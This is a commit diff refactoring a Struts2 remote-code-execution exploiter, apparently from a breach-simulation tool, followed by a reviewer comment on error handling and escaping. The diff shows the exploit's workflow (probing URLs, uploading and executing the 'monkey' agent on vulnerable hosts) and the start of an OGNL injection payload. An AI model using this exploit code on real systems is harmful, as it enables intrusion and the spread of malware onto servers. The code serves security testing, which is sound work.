Struts2 refactored for framework fixes

This commit is contained in:
Vakaris 2018-08-10 15:04:23 +03:00
parent 8d7221eada
commit beb8dfed92
1 changed files with 11 additions and 15 deletions


@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
super(Struts2Exploiter, self).__init__(host) super(Struts2Exploiter, self).__init__(host)
def exploit_host(self): def exploit_host(self):
# We need a reference to the exploiter for WebRCE framework to use
exploiter = self.exploit
# Get open ports # Get open ports
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) ports = self.get_ports_w(self.HTTP, ["http"])
if not ports: if not ports:
return False return False
# Get urls to try to exploit # Get urls to try to exploit
urls = WebRCE.build_potential_urls(self.host, ports) urls = self.build_potential_urls(ports)
vulnerable_urls = [] vulnerable_urls = []
for url in urls: for url in urls:
# Get full URL # Get full URL
url = self.get_redirected(url) url = self.get_redirected(url)
if WebRCE.check_if_exploitable(exploiter, url): if self.check_if_exploitable(url):
vulnerable_urls.append(url) vulnerable_urls.append(url)
self._exploit_info['vulnerable_urls'] = vulnerable_urls self._exploit_info['vulnerable_urls'] = vulnerable_urls
if not vulnerable_urls: if not vulnerable_urls:
return False return False
# We need to escape backslashes for our exploiter
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
LOG.info("Host %s was already infected under the current configuration, done" % self.host) LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): if not self.set_host_arch(vulnerable_urls[0]):
return False return False
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0]) data = self.upload_monkey(vulnerable_urls[0])
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if data is not False and data['response'] == False: if data is not False and data['response'] is False:
return False return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
return False return False
return True return True
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
:param cmd: Code to try and execute on host :param cmd: Code to try and execute on host
:return: response :return: response
""" """
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = "%%{(#_='multipart/form-data')." \ payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \ "(#_memberAccess?" \
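Review bot: In the first hunk, the `data is not False` guard on the line after `data = self.upload_monkey(vulnerable_urls[0])` lets a `False` result fall through to `self.change_permissions(vulnerable_urls[0], data['path'])`, which raises TypeError because `False` is not subscriptable; the guard should fail closed instead, `if data is False or data['response'] is False:` followed by the existing `return False`. The shape is pre-existing, but the commit rewrites every line of that block and keeps it. In the second hunk the two `re.sub` calls are literal replacements, which `cmd = cmd.replace("\\", "\\\\").replace("'", "\\'")` expresses without regex escaping of both pattern and replacement; the method enclosing those lines starts outside the hunk. A one-line comment such as `# double backslashes before escaping quotes, so the added backslash is not doubled again; presumably cmd is embedded in a single-quoted OGNL literal` would record why that order matters.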